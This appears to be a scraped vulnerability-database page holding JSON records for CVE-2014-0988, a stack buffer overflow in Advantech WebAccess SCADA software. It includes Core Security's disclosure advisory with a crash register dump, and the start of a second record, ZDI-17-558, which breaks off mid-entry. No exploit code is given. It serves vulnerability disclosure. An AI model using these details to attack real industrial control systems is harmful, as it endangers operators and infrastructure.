Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
-
Disclaimer
The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
-
PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201409-0442", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 3.0, "vendor": "advantech", "version": "7.2" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "7.2" } ], "sources": [ { "db": "IVD", "id": "d280bd4c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05420" }, { "db": "JVNDB", "id": "JVNDB-2014-004355" }, { "db": "CNNVD", "id": "CNNVD-201409-735" }, { "db": "NVD", "id": "CVE-2014-0988" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-004355" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Ricardo Narvaja", "sources": [ { "db": "BID", "id": "69533" } ], "trust": 0.3 }, "cve": "CVE-2014-0988", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2014-0988", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-05420", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "d280bd4c-2351-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-68481", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-0988", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2014-0988", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2014-05420", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201409-735", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "d280bd4c-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-68481", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "d280bd4c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05420" }, { "db": "VULHUB", "id": "VHN-68481" }, { "db": "JVNDB", "id": "JVNDB-2014-004355" }, { "db": "CNNVD", "id": "CNNVD-201409-735" }, { "db": "NVD", "id": "CVE-2014-0988" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stack-based buffer overflow in Advantech WebAccess (formerly BroadWin WebAccess) 7.2 allows remote attackers to execute arbitrary code via the AccessCode parameter. Advantech WebAccess is an IE-based HMI/SCADA monitoring software that features all engineering projects, database setup, drawing and software management using a standard browser over the internet or intranet. A buffer overflow vulnerability exists in Advantech WebAccess. An attacker exploits a vulnerability to execute arbitrary code in the context of an affected application or to crash the entire application. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will likely cause a denial-of-service condition. \nAdvantech WebAccess 7.2 is vulnerable; other versions may also be affected. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nAdvantech WebAccess Vulnerabilities\n\n\n1. *Advisory Information*\n\n Title: Advantech WebAccess Vulnerabilities\n Advisory ID: CORE-2014-0005\n Advisory URL:\nhttp://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities\n Date published: 2014-09-02\n Date of last update: 2014-09-01\n Vendors contacted: Advantech\n Release mode: User release\n\n\n2. *Vulnerability Description*\n\n Advantech WebAccess [1] is a browser-based\n software package for human-machine interfaces HMI, and supervisory\n control and data acquisition SCADA. \n\n\n4. WebAccess 7.2\n . \n\n\n5. *Non-vulnerable packages*\n\n . AdvantechWebAccessUSANode_20140730_3.4.3\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\n Advantech has addressed the vulnerability in WebAccess by issuing an\nupdate located at\n http://webaccess.advantech.com/downloads_software.php\n\n Given that this is a client-side vulnerability, affected users\nshould avoid\n opening untrusted \u0027.html\u0027 files. \n Core Security also recommends those affected use third party\nsoftware such as\n Sentinel [4] or EMET [3]\n that could help to prevent the exploitation of affected systems to\nsome extent. \n\n\n7. *Credits*\n\n This vulnerability was discovered and researched by Ricardo Narvaja\nfrom\n Core Security Exploit Writers Team. \n \n Core Security Advisories Team would also like to thank ICS-CERT\nCoordination Center\n for their assistance during the vulnerability reporting process. \n \n\n8. \n\n Below is shown the result of opening a malicious html file with a long\n NodeName parameter, an attacker can overflow the stack buffer mentioned\n above and overwrite the SEH (Structured Exception Handler), enabling\n arbitrary code execution on the machine. \n\n/-----\n \nEAX 03A39942 ASCII \"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB...\"\nECX 0162B720\nEDX 01630000 xpsp2res.01630000\nEBX 0162B720\nESP 0162B454\nEBP 0162B460\nESI 0162B4D8\nEDI 03A31E98\nEIP 064EA6D4 webvact.064EA6D4\n\n-----/\n\n\n/-----\n \nSEH chain of thread 000016CC\nAddress SE handler\n0162DB40 42424242\n\n-----/\n\n\n9. *Report Timeline*\n . 2014-05-06: Core Security notifies Advantech of the vulnerability. \nPublication date is set for May 26th, 2014. 2014-05-09: CORE asks for a reply. 2014-05-26: First release date missed. 2014-05-26: Core Security notifies that the issues were reported 2\nweeks ago and there was no reply since May 6th, 2014. 2014-05-29: Core Security contacts the ICS-CERT for assistance in\norder to coordinate the disclosure of the advisory. 2014-05-29: ICS-CERT acknowledges Core Security e-mail, and asks\nfor a technical description of the vulnerability. 2014-05-29: Core Security sends technical details to the ICS-CERT. 2014-06-05: ICS-CERT team notifies that they have contacted the\nvendor and that they will notify us once the vendor has validated the\nvulnerabilities. 2014-06-18: ICS-CERT team notifies that the vendor is working in a\nnew release, expected to be released in September, and ask if Core\nSecurity is interested in validating Advantech\u0027s vulnerability fix in\ntheir beta version. 2014-06-18: Core Security accepts the testing of the vendor beta\nversion, but shares their concerns about waiting several months for\nfixes that are related to vulnerabilities already public. 2014-06-18: ICS-CERT notifies that they will let us know when they\nplan to make the beta version available for testing. 2014-07-03: ICS-CERT team notifies that the vendor is working to\nprovide a download link for the beta version. 2014-07-08: ICS-CERT team sends download link provided by the vendor. 2014-07-10: Core Security confirms to ICS-CERT that the new\nversion it\u0027s still vulnerable, and comments that after some analysis the\nvulnerable function doesn\u0027t has changes. 2014-07-10: ICS-CERT notifies that they will let the vendor know\nthat that the vulnerabilities still exist. And asks to setup a\nteleconference between Core Security, the CERT and the vendor. 2014-07-10: Core Security notifies the ICS-CERT that all\ninteractions are made via email only. 2014-07-10: ICS-CERT notifies they provided the information to the\nvendor. 2014-07-21: Core Security notifies the ICS-CERT that Tipping Point\nZero Day Initiative has released several advisories[2] affecting the\nvendor including some that appears to be related to the one we are\ncoordinating. 2014-07-21: ICS-CERT notifies that some of those advisories where\nin coordination with them, and that after a review of the link shared by\nCore Security are related to ICSA-14-198-02 and don\u0027t appear to be\nrelated to the reported vulnerability. 2014-07-21: Core Security notifies that ZDI-14-243 and ZDI-14-244\nappears to be directly related. 2014-07-21: ICS-CERT is trying to contact Advantech to get a\nstatus update and their current plan for vulnerability remediation. 2014-08-07: ICS-CERT notifies that they contacted the vendor and\nthey are waiting for an status update. 2014-08-21: Core Security contacts ICS-CERT since no reply was\nreceived in the past two weeks. 2014-08-21: ICS-CERT notifies that vendor representative stated\nthat they are currently training a new product manager and they have not\nyet responded to the vulnerabilities we are discussing. 2014-08-28: Core Security notifies the ICS-CERT that the advisory\npublication is going to be scheduled for Monday 1st of September. 2014-08-28: ICS-CERT acknowledges Core Security e-mail. 2014-08-28: Core Security re-schedules the advisory publication\nfor Sep 2nd, 2014. 2014-09-02: Core Security found out that the vendor released a\nsilent fix on 30th of July. 2014-09-02: Core Security releases the advisory CORE-2014-0005\ntagged as user-release. \n\n\n10. *References*\n\n [1] http://webaccess.advantech.com/. \n [2] http://www.zerodayinitiative.com/advisories/published/. \n [3] http://support.microsoft.com/kb/2458544. \n [4] https://github.com/CoreSecurity/sentinel. \n\n\n11. *About CoreLabs*\n\n CoreLabs, the research center of Core Security, is charged with\nanticipating\n the future needs and requirements for information security\ntechnologies. \n We conduct our research in several important areas of computer security\n including system vulnerabilities, cyber attack planning and simulation,\n source code auditing, and cryptography. Our results include problem\n formalization, identification of vulnerabilities, novel solutions and\n prototypes for new technologies. CoreLabs regularly publishes security\n advisories, technical papers, project information and shared software\n tools for public use at:\n http://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\n Core Security Technologies enables organizations to get ahead of threats\n with security test and measurement solutions that continuously identify\n and demonstrate real-world exposures to their most critical assets. Our\n customers can gain real visibility into their security standing, real\n validation of their security controls, and real metrics to more\n effectively secure their organizations. \n\n Core Security\u0027s software solutions build on over a decade of trusted\n research and leading-edge threat expertise from the company\u0027s Security\n Consulting Services, CoreLabs and Engineering groups. Core Security\n Technologies can be reached at +1 (617) 399-6980 or on the Web at:\n http://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\n The contents of this advisory are copyright\n (c) 2014 Core Security and (c) 2014 CoreLabs,\n and are licensed under a Creative Commons\n Attribution Non-Commercial Share-Alike 3.0 (United States) License:\n http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\n This advisory has been signed with the GPG key of Core Security\nadvisories\n team, which is available for download at\n \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc", "sources": [ { "db": "NVD", "id": "CVE-2014-0988" }, { "db": "JVNDB", "id": "JVNDB-2014-004355" }, { "db": "CNVD", "id": "CNVD-2014-05420" }, { "db": "BID", "id": "69533" }, { "db": "IVD", "id": "d280bd4c-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-68481" }, { "db": "PACKETSTORM", "id": "128120" } ], "trust": 2.79 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-68481", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-68481" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0988", "trust": 3.7 }, { "db": "ICS CERT", "id": "ICSA-14-261-01", "trust": 3.1 }, { "db": "BID", "id": "69533", "trust": 2.0 }, { "db": "CNNVD", "id": "CNNVD-201409-735", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2014-05420", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-004355", "trust": 0.8 }, { "db": "CXSECURITY", "id": "WLB-2014090006", "trust": 0.6 }, { "db": "IVD", "id": "D280BD4C-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-68481", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128120", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "d280bd4c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05420" }, { "db": "VULHUB", "id": "VHN-68481" }, { "db": "BID", "id": "69533" }, { "db": "JVNDB", "id": "JVNDB-2014-004355" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-735" }, { "db": "NVD", "id": "CVE-2014-0988" } ] }, "id": "VAR-201409-0442", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "d280bd4c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05420" }, { "db": "VULHUB", "id": "VHN-68481" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "d280bd4c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05420" } ] }, "last_update_date": "2024-11-23T22:38:56.304000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/GF-1M94V/Advantech-WebAccess/mod_B975C492-56B3-4EBA-8BBB-5B6D3483EE9D.aspx" }, { "title": "Patch for Advantech WebAccess Buffer Overflow Vulnerability (CNVD-2014-05420)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/53294" }, { "title": "AdvantechWebAccessUSANode_20140730_3.4.3", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=51645" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-05420" }, { "db": "JVNDB", "id": "JVNDB-2014-004355" }, { "db": "CNNVD", "id": "CNNVD-201409-735" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-68481" }, { "db": "JVNDB", "id": "JVNDB-2014-004355" }, { "db": "NVD", "id": "CVE-2014-0988" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-261-01" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/69533" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0988" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0988" }, { "trust": 0.6, "url": "http://cxsecurity.com/issue/wlb-2014090006" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0987" }, { "trust": 0.1, "url": "http://corelabs.coresecurity.com/" }, { "trust": 0.1, "url": "http://webaccess.advantech.com/." }, { "trust": 0.1, "url": "http://www.coresecurity.com." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0988" }, { "trust": 0.1, "url": "http://www.zerodayinitiative.com/advisories/published/." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0992" }, { "trust": 0.1, "url": "http://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0989" }, { "trust": 0.1, "url": "https://github.com/coresecurity/sentinel." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0991" }, { "trust": 0.1, "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0990" }, { "trust": 0.1, "url": "http://corelabs.coresecurity.com." }, { "trust": 0.1, "url": "http://webaccess.advantech.com/downloads_software.php" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0986" }, { "trust": 0.1, "url": "http://support.microsoft.com/kb/2458544." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0985" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-05420" }, { "db": "VULHUB", "id": "VHN-68481" }, { "db": "JVNDB", "id": "JVNDB-2014-004355" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-735" }, { "db": "NVD", "id": "CVE-2014-0988" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "d280bd4c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05420" }, { "db": "VULHUB", "id": "VHN-68481" }, { "db": "BID", "id": "69533" }, { "db": "JVNDB", "id": "JVNDB-2014-004355" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-735" }, { "db": "NVD", "id": "CVE-2014-0988" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-09-05T00:00:00", "db": "IVD", "id": "d280bd4c-2351-11e6-abef-000c29c66e3d" }, { "date": "2014-09-05T00:00:00", "db": "CNVD", "id": "CNVD-2014-05420" }, { "date": "2014-09-20T00:00:00", "db": "VULHUB", "id": "VHN-68481" }, { "date": "2014-09-02T00:00:00", "db": "BID", "id": "69533" }, { "date": "2014-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-004355" }, { "date": "2014-09-02T22:28:11", "db": "PACKETSTORM", "id": "128120" }, { "date": "2014-09-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201409-735" }, { "date": "2014-09-20T10:55:04.073000", "db": "NVD", "id": "CVE-2014-0988" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-12-29T00:00:00", "db": "CNVD", "id": "CNVD-2014-05420" }, { "date": "2015-08-05T00:00:00", "db": "VULHUB", "id": "VHN-68481" }, { "date": "2014-09-22T18:05:00", "db": "BID", "id": "69533" }, { "date": "2014-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-004355" }, { "date": "2014-09-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201409-735" }, { "date": "2024-11-21T02:03:10.170000", "db": "NVD", "id": "CVE-2014-0988" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201409-735" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Vulnerable to stack-based buffer overflow", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-004355" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "d280bd4c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201409-735" } ], "trust": 0.8 } }
var-201708-1578
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within RtspVapgDecoderNew2.dll. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 1.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.4, "vendor": "advantech", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e018dbe7-3f33-48d3-9d02-da56931bf1f5" }, { "db": "IVD", "id": "7d7b572f-463f-11e9-9535-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-17-558" }, { "db": "CNVD", "id": "CNVD-2017-19444" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-558" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-558", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2017-19444", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e018dbe7-3f33-48d3-9d02-da56931bf1f5", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "7d7b572f-463f-11e9-9535-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-558", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2017-19444", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "e018dbe7-3f33-48d3-9d02-da56931bf1f5", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "7d7b572f-463f-11e9-9535-000c29342cb1", "trust": 0.2, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "e018dbe7-3f33-48d3-9d02-da56931bf1f5" }, { "db": "IVD", "id": "7d7b572f-463f-11e9-9535-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-17-558" }, { "db": "CNVD", "id": "CNVD-2017-19444" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within RtspVapgDecoderNew2.dll. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment", "sources": [ { "db": "ZDI", "id": "ZDI-17-558" }, { "db": "CNVD", "id": "CNVD-2017-19444" }, { "db": "IVD", "id": "e018dbe7-3f33-48d3-9d02-da56931bf1f5" }, { "db": "IVD", "id": "7d7b572f-463f-11e9-9535-000c29342cb1" } ], "trust": 1.53 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-558", "trust": 1.3 }, { "db": "CNVD", "id": "CNVD-2017-19444", "trust": 1.0 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4085", "trust": 0.7 }, { "db": "IVD", "id": "E018DBE7-3F33-48D3-9D02-DA56931BF1F5", "trust": 0.2 }, { "db": "IVD", "id": "7D7B572F-463F-11E9-9535-000C29342CB1", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "e018dbe7-3f33-48d3-9d02-da56931bf1f5" }, { "db": "IVD", "id": "7d7b572f-463f-11e9-9535-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-17-558" }, { "db": "CNVD", "id": "CNVD-2017-19444" } ] }, "id": "VAR-201708-1578", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "e018dbe7-3f33-48d3-9d02-da56931bf1f5" }, { 